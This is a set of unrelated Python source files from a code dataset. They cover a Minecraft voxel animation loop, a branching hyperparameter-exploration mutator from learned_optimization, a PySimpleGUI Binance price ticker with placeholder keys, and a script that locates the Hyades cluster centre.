ply_files = ['frog1.ply', 'frog2.ply', 'frog3.ply', 'frog4.ply', 'frog5.ply', 'frog4.ply', 'frog3.ply', 'frog2.ply']
# pause after clearing the build area, before drawing the next frame (seconds)
reset_stop = 0.01
# pause after drawing a frame (seconds)
create_stop = 0.1
# total number of animation frames to draw
repeat_count = 50
# reset area
reset_size = (-10, 0, -10, 10, 20, 10)
# Origin to create (Minecraft)
x0 = 0
y0 = 0
z0 = 0
# Rotation degree (MagicaVoxel)
alpha = 0 # x-axis
beta = 0 # y-axis
gamma = 0 # z-axis
model_settings = {
'x0': x0,
'y0': y0,
'z0': z0,
'alpha': alpha,
'beta': beta,
'gamma': gamma,
}
post_to_chat('animation polygon file format model')
box_positions_list = [ply_to_positions(ply_file) for ply_file in ply_files]
clear()
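# Animation loop: wipe the build area, then draw the next frame; the frame index cycles
# through ply_files via modulo, so the sequence repeats until repeat_count iterations finish.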
for i in range(repeat_count):
print(i)
reset_area(*reset_size)
sleep(reset_stop)
create_voxel(box_positions_list[i % len(ply_files)], model_settings)
sleep(create_stop)
| StarcoderdataPython |
3345740 | # coding=utf-8
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Explore hparams on a single machine."""
import time
from typing import Any, Callable, Mapping, MutableMapping, Sequence, Tuple
import gin
from learned_optimization.population import population
import numpy as onp
BranchingState = Mapping[str, Any]
@gin.configurable
class BranchingSingleMachine(population.Mutate):
r"""Explore hparams on a single machine!
This is a simple statemachine based mutator.
First, we perturb a hparam in some direction (governed by `mutate_fn`) and try
training in this direction for `explore_steps`.
Once done, we reset, and explore the opposite direction (also governed by
`mutate_fn`) for explore_steps`.
Once done, we select the best direction, reset to the end of that
corresponding explore phase, and continue training for `exploit\_steps`.
This process then repeats.
"""
# this is a simple state machine.
def __init__(self, mutate_fn: Callable[[Any, str, int], Any],
exploit_steps: int, explore_steps: int):
"""Initializer.
Args:
mutate_fn: A deterministic function mapping from hyper parameters, phase
(either "pos" or "neg"), and phase_indx -- or the number of previous
branchings. This should return a new hyper-parameter value.
exploit_steps: number of steps in exploit phase
explore_steps: number of steps in explore phase
"""
self._mutate_fn = mutate_fn
self._exploit_steps = exploit_steps
self._explore_steps = explore_steps
def init(self) -> BranchingState:
return {
"neg": None,
"pos": None,
"center": None,
"center_meta_params": None,
"branch_checkpoint": None,
"start_params": None,
"start_exploit": 0,
"phase": "explore_center",
"phase_idx": 0,
}
def update(
self, state: BranchingState,
current_workers: Sequence[population.ActiveWorker],
cache: MutableMapping[population.GenerationID,
MutableMapping[int, population.Checkpoint]]
) -> Tuple[BranchingState, Sequence[population.ActiveWorker]]:
# copy dict to make pytype happy
state = {**state} # type: MutableMapping[str, Any]
assert len(current_workers) == 1
worker = current_workers[0]
steps = cache[worker.generation_id]
if not steps:
return state, current_workers
def add_worker_to_cache(from_checkpoint: population.Checkpoint,
worker: population.ActiveWorker):
"""Helper function to add a new checkpoint to the cache."""
checkpoint = population.Checkpoint(
generation_id=worker.generation_id,
params=worker.params,
meta_params=worker.meta_params,
parent=(from_checkpoint.generation_id, from_checkpoint.step),
step=worker.step,
value=None,
time=time.time(),
)
if worker.generation_id not in cache:
cache[worker.generation_id] = population.IntKeyDict()
cache[worker.generation_id][worker.step] = checkpoint
if state["branch_checkpoint"] is None:
state["branch_checkpoint"] = steps[0]
state["center"] = steps[0].generation_id
last_checkpoint = steps.values()[-1]
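    # Dispatch on the current phase: "exploit" keeps training the chosen branch, while the
    # explore phases evaluate the unperturbed center and two perturbed hyperparameter
    # directions from the branch checkpoint before picking the best one.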
if state["phase"] == "exploit":
# switch to center.
if last_checkpoint.step - state["start_exploit"] >= self._exploit_steps:
meta_params = last_checkpoint.meta_params
genid = population.make_gen_id()
next_workers = [
population.ActiveWorker(last_checkpoint.params, meta_params, genid,
last_checkpoint.step)
]
state["branch_checkpoint"] = last_checkpoint
state["center"] = genid
state["phase"] = "explore_center"
add_worker_to_cache(state["branch_checkpoint"], next_workers[0])
return state, next_workers
else:
return state, current_workers
else:
should_switch = last_checkpoint.step - state[
"branch_checkpoint"].step >= self._explore_steps
if should_switch:
segment = state["phase"].split("_")[-1]
if segment == "center":
# next state is neg
genid = population.make_gen_id()
state["neg"] = genid
state["phase"] = "explore_neg"
meta_params = state["branch_checkpoint"].meta_params
meta_params = self._mutate_fn(meta_params, "pos", state["phase_idx"])
next_workers = [
population.ActiveWorker(state["branch_checkpoint"].params,
meta_params, genid,
state["branch_checkpoint"].step)
]
add_worker_to_cache(state["branch_checkpoint"], next_workers[0])
return state, next_workers
elif segment == "neg":
# next state is pos
genid = population.make_gen_id()
state["pos"] = genid
state["phase"] = "explore_pos"
meta_params = state["branch_checkpoint"].meta_params
meta_params = self._mutate_fn(meta_params, "neg", state["phase_idx"])
next_workers = [
population.ActiveWorker(state["branch_checkpoint"].params,
meta_params, genid,
state["branch_checkpoint"].step)
]
add_worker_to_cache(state["branch_checkpoint"], next_workers[0])
return state, next_workers
# next state is exploit
elif segment == "pos":
take_values_from = state[
"branch_checkpoint"].step + self._explore_steps
center_steps = cache[state["center"]]
neg_steps = cache[state["neg"]]
pos_steps = cache[state["pos"]]
state["center"] = None
state["neg"] = None
state["pos"] = None
state["start_exploit"] = last_checkpoint.step
state["phase"] = "exploit"
state["phase_idx"] += 1
if take_values_from not in center_steps:
raise ValueError(
f"The eval @ step {take_values_from} not there for center? \n {center_steps}"
)
if take_values_from not in neg_steps:
raise ValueError(
f"The eval @ step {take_values_from} not there for neg? \n {neg_steps}"
)
if take_values_from not in pos_steps:
raise ValueError(
f"The eval @ step {take_values_from} not there for pos? \n {pos_steps}"
)
center_score = center_steps[take_values_from].value
neg_score = neg_steps[take_values_from].value
pos_score = pos_steps[take_values_from].value
scores = [center_score, neg_score, pos_score]
idx = onp.nanargmin(scores)
best_checkpoint = [center_steps, neg_steps,
pos_steps][idx].values()[-1]
meta_params = best_checkpoint.meta_params
genid = population.make_gen_id()
next_workers = [
population.ActiveWorker(best_checkpoint.params, meta_params,
genid, best_checkpoint.step)
]
add_worker_to_cache(best_checkpoint, next_workers[0])
return state, next_workers
else:
raise ValueError(f"unknown phase {state['phase']}")
else:
return state, current_workers
| StarcoderdataPython |
9098 | <gh_stars>0
from binance.client import Client
import PySimpleGUI as sg
api_key = "your_binance_apikey"
secret_key = "your_binance_secretkey"
client = Client(api_key=api_key, api_secret=secret_key)
# price
def get_price(coin):
return round(float(client.get_symbol_ticker(symbol=f"{coin}USDT")['price']), 5)
def column_layout_price(coin):
col =[[sg.Text(f"{get_price(coin)}", font=("Arial", 9, 'bold'), size=(10,1), pad=(15,10), key=coin)]]
return col
# 24h percentchange
def price_change_24h(coin):
return round(float(client.get_ticker(symbol=f"{coin}USDT")["priceChangePercent"]), 2)
def column_layout_change(coin):
if price_change_24h(coin) == 0:
return [[sg.Text(f"{price_change_24h(coin)}%", font=("Arial", 9, 'bold'), size=(7,1), pad=(40,10), text_color="black", key=f"{coin}change")]]
elif price_change_24h(coin) > 0:
return [[sg.Text(f"+{price_change_24h(coin)}%", font=("Arial", 9, 'bold'), size=(7,1), pad=(40,10), text_color="green", key=f"{coin}change")]]
return [[sg.Text(f"{price_change_24h(coin)}%", font=("Arial", 9, 'bold'), size=(7,1), pad=(40,10), text_color="red", key=f"{coin}change")]]
def update_24h_change(coin):
if price_change_24h(coin) == 0:
window[f"{coin}change"].update(f"+{price_change_24h(coin)}%", text_color="black")
elif price_change_24h(coin) > 0:
window[f"{coin}change"].update(f"+{price_change_24h(coin)}%", text_color="green")
elif price_change_24h(coin) < 0:
window[f"{coin}change"].update(f"{price_change_24h(coin)}%", text_color="red")
# GUI
sg.theme('DefaultNoMoreNagging')
# Tabs
def tabs(coin):
tab_layout = [[sg.Image("{}.png".format(coin), size=(50,50)),
sg.Text("Price", font=("Arial", 10, 'bold'), size=(7,1), pad=(40,40)), sg.Text("24h change", font=("Arial", 10, 'bold'), size=(10,1), pad=(10,40))],
[sg.Text(f"{coin}/USDT", font=("Arial", 9, 'bold')), sg.Column(column_layout_price(coin)), sg.Column(column_layout_change(coin))]]
return tab_layout
# Layout
layout = [[sg.Text("Crypto Currencies", font=("Arial", 10, 'bold'))],
[sg.TabGroup([[sg.Tab("BTC", tabs("BTC"), border_width="18"), sg.Tab("XRP", tabs("XRP"), border_width="18"), sg.Tab("DOGE", tabs("DOGE"), border_width="18")]])]]
window = sg.Window("NightLeaf Crypto", layout)
def coin_window(*coins):
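    # The previously displayed price for each coin is kept in a module-level global so the
    # polling loop below can colour the price with an up/down arrow relative to it.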
for coin in coins:
globals()[f"{coin}_last_price"] = 1
while True:
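        # Poll the GUI roughly every 600 ms; each pass refreshes the 24h change and price.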
event,values = window.read(timeout=600)
if event == sg.WIN_CLOSED:
break
for coin in coins:
update_24h_change(coin)
price = get_price(coin)
if price != globals()[f"{coin}_last_price"]:
if price > globals()[f"{coin}_last_price"]:
window[f"{coin}"].update(f"{price} 🠕", text_color="green")
elif price < globals()[f"{coin}_last_price"]:
window[f"{coin}"].update(f"{price} 🠗", text_color="red")
globals()[f"{coin}_last_price"] = price
a_list =["BTC", "XRP", "DOGE"]
coin_window(*a_list)
| StarcoderdataPython |
1661142 | <filename>hyades/determine-cluster-center.py<gh_stars>1-10
"""
Determine cluster center with a radius cut as the position
where the postional membership within the radius cut does not change.
- The radius cut should be large enough to contain substantial number of stars
otherwise it will just depend on the statistical fluctuation of the mean of
small number of stars.
- The radius cut should be not too large as then, it
will be subject to larger contamination rate far from the cluster.
"""
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import astropy.coordinates as coord
import kinesis as kn
import data
kn.set_mpl_style()
def xyz_icrs_to_galactic(xyz):
c = coord.ICRS(*xyz, representation_type="cartesian")
return c.transform_to(coord.Galactic).cartesian.xyz.value
df = data.load_hyades_dataset()
df = df.loc[df["Member_r19"] != "other"].reset_index(drop=True)
print(len(df), "rows")
cl_gaia = df.loc[df["in_dr2"] == True].copy()
b_c_icrs_cl_gaia_mean = cl_gaia.g.icrs.cartesian.xyz.mean(axis=1).value
b_c_galactic_cl_gaia_mean = xyz_icrs_to_galactic(b_c_icrs_cl_gaia_mean)
xyz = df.g.icrs.cartesian.xyz.value
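# ICRS cartesian positions with shape (3, N): one column per star, in pc.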
# list storage for boolean flag array; initially consider all stars
in_rcut = [np.ones(xyz.shape[1]).astype(bool)]
# radius cut: large enough to keep a robust number of stars in the mean,
# small enough to limit field contamination (see module docstring)
r_cut = 10 # pc, radius cut
niter = 20 # maximum number of iteration
print("N={:d} r_cut={:.2f} max iter={:d}".format(len(df), r_cut, niter))
for i in range(niter):
prev = in_rcut[-1]
b_c = xyz[:, prev].mean(axis=1)
r_c = np.linalg.norm(xyz - b_c[:, None], axis=0)
current = r_c < r_cut
bool_remove = (~current) & (prev)
bool_include = (current) & (~prev)
if (current == prev).all():
print("iter {:2d} b_c={} membership converged".format(i, b_c))
break
else:
print(
"iter {:2d} b_c={} removing {:d} including {:d}".format(
i, b_c, bool_remove.sum(), bool_include.sum()
)
)
in_rcut.append(current)
# report final values
b_c_icrs_iter_mean = b_c
b_c_galactic_iter_mean = xyz_icrs_to_galactic(b_c)
r_c = np.linalg.norm(xyz - b_c_icrs_iter_mean[:, None], axis=0)
n_r_cut = (r_c < r_cut).sum()
n_r_cut_p05 = (r_c < r_cut + 0.5).sum()
n_r_cut_m05 = (r_c < r_cut - 0.5).sum()
print("final b_c icrs =", b_c_icrs_iter_mean)
print("final b_c galactic =", b_c_galactic_iter_mean)
print(n_r_cut, n_r_cut_p05, n_r_cut_m05)
reino2018 = dict(
b_c_galactic=np.array([-44.16, 0.66, -17.76]), # pc
b_c_galactic_err=np.array([0.74, 0.39, 0.41]), # pc
)
report_df = pd.DataFrame.from_dict(
{
"final b_c icrs": b_c_icrs_iter_mean,
"final b_c galactic": b_c_galactic_iter_mean,
"mean of cl gaia icrs": b_c_icrs_cl_gaia_mean,
"mean of cl gaia galactic": b_c_galactic_cl_gaia_mean,
"Reino 2018 galactic": reino2018["b_c_galactic"],
},
orient="index",
columns=("x", "y", "z"),
)
print(report_df)
#%% summary plot: distribution of stars from the center
fig, (axhist, axdens) = plt.subplots(1, 2, figsize=(7, 3), sharex=True)
bins = np.logspace(-1, 2.5, 32)
axhist.hist(r_c, bins)
axhist.axvline(r_cut, c="k")
axhist.set_xlabel("$r_c$ [pc]")
axhist.set_ylabel("count [pc]")
axhist.set_xscale("log")
s, be = np.histogram(r_c, bins)
bc = (be[1:] + be[:-1]) * 0.5
numdens = s / (np.pi * 4 * bc ** 2) / (be[1] - be[0])
axdens.plot(bc, numdens, "o-")
axdens.axvline(r_cut, c="k")
axdens.set_xscale("log")
axdens.set_yscale("log")
axdens.set_ylim(1e-3, 200)
axdens.set_xlabel("$r_c$ [pc]")
axdens.set_ylabel("number density [pc$^{-3}$]")
fig.tight_layout()
fig.savefig("../report/r_c_dist.pdf")
#%% summary plot: distribution of stars in Galactic coordinates
fig, (ax_xy, ax_xz) = plt.subplots(2, 1, figsize=(3, 6), sharex=True,)
ax_xy.set_aspect("equal")
ax_xz.set_aspect("equal")
ax_xy.scatter(df["gx"], df["gy"], s=1, c="tab:gray")
ax_xz.scatter(df["gx"], df["gz"], s=1, c="tab:gray")
def add_circle(center, radius, ax=None):
from matplotlib.patches import Circle
if ax is None:
ax = plt.gca()
circle = Circle(center, radius, facecolor="None", edgecolor="k")
ax.add_patch(circle)
xy_cen = [b_c_galactic_iter_mean[0], b_c_galactic_iter_mean[1]]
xz_cen = [b_c_galactic_iter_mean[0], b_c_galactic_iter_mean[2]]
add_circle(xy_cen, r_cut, ax=ax_xy)
add_circle(xz_cen, r_cut, ax=ax_xz)
ax_xy.set_xlabel("$x$ [pc]")
ax_xy.set_ylabel("$y$ [pc]")
ax_xz.set_xlabel("$x$ [pc]")
ax_xz.set_ylabel("$z$ [pc]")
fig.suptitle("Galactic")
fig.tight_layout()
fig.savefig("report/galactic_xyz.pdf")
print("check radial velocities")
N_rv = (df["radial_velocity"].notna()).sum()
N_10 = (r_c < 10).sum()
N_10_rv = ((r_c < 10) & (df["radial_velocity"].notna())).sum()
print("N rv =", N_rv)
print("N(r_c<10) = {} N(r_c<10 and has rv) = {}".format(N_10, N_10_rv))
print("N(r_c>10) = {} N(r_c<10 and has rv) = {}".format(len(df) - N_10, N_rv - N_10_rv))
| StarcoderdataPython |
3300241 | #
# Copyright (c) 2021 kumattau
#
# Use of this source code is governed by a MIT License
#
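# Re-export the public API and module metadata of the greetings submodule at package level.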
from .greetings import __doc__, __all__, __version__
from .greetings import *
| StarcoderdataPython |